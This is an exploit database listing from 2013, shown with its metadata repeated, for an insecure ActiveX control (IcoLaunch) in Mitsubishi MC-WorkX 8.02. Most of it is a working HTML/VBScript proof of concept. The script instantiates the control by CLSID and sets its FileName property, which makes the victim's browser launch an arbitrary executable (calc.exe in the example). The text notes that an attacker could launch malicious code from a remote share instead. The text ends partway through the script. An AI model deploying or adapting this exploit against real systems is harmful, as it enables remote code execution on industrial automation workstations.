Mitsubishi MC-WorkX 8.02 ActiveX Control (IcoLaunch) File Execution
| EKU-ID: 3496 | CVE: | OSVDB-ID: |
| Author: Blake | Published: 2013-09-16 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 3496 | CVE: | OSVDB-ID: |
| Author: Blake | Published: 2013-09-16 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
<html> <object classid='clsid:C28A127E-4A85-11D3-A5FF-00A0249E352D' id='target'></object> <!-- Mitsubishi MC-WorkX Suite Insecure ActiveX Control - IcoLaunch.dll Vendor: http://www.meau.com Version: MC-WorkX 8.02 Tested on: Windows XP SP3 / IE 6 Download: http://www.meau.com/functions/dms/getfile.asp?ID=035000000000000001000000908800000 Author: Blake CLSID: C28A127E-4A85-11D3-A5FF-00A0249E352D ProgId: ICOLAUNCHLib.LaunchCtl Path: C:\Program Files\Mitsubishi Electric Automation\MC-WorX\Bin\IcoLaunch.dll MemberName: FileName Safe for scripting: True Safe for init: True Kill Bit: False --> <title>Mitsubishi MC-WorkX Suite Insecure ActiveX Control (IcoLaunch)</title> <p>This proof of concept will launch an arbritrary executable when the Login Client button is clicked. An attacker could use this to have the victim launch malicious code from a remote share. Calc is used in this example.</p> <script language='vbscript'> file="C:\\WINDOWS\\system32\\calc.exe" target.FileName = file